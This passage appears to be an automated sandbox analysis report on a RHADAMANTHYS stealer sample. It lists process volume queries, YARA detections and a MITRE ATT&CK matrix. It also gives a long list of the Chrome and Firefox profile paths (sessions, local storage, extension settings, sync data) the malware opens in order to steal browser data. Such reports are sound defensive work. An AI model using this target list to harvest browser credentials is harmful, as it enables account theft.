                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415859B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,18_3_00007DF4415859B0
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: svchost.exe, 00000011.00000002.2356575776.0000000003700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 00000011.00000003.2266293823.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.2268036738.0000000020B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.2356833035.0000000003950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.2263199708.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5900, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 00000011.00000003.2266293823.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.2268036738.0000000020B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.2356833035.0000000003950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.2263199708.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415859B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,18_3_00007DF4415859B0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 24_2_00000286F608D004 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,24_2_00000286F608D004

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information211
                        Scripting                        		Valid Accounts111
                        Windows Management Instrumentation                        		211
                        Scripting                        		1
                        DLL Side-Loading                        		2
                        Obfuscated Files or Information                        		1
                        OS Credential Dumping                        		13
                        File and Directory Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		1
                        Extra Window Memory Injection                        		2
                        Software Packing                        		21
                        Input Capture                        		225
                        System Information Discovery                        		Remote Desktop Protocol11
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		1
                        Create Account                        		512
                        Process Injection                        		1
                        DLL Side-Loading                        		Security Account Manager341
                        Security Software Discovery                        		SMB/Windows Admin Shares21
                        Input Capture                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        PowerShell                        		Login HookLogin Hook1
                        Extra Window Memory Injection                        		NTDS161
                        Virtualization/Sandbox Evasion                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                        Masquerading                        		LSA Secrets2
                        Process Discovery                        		SSHKeylogging3
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
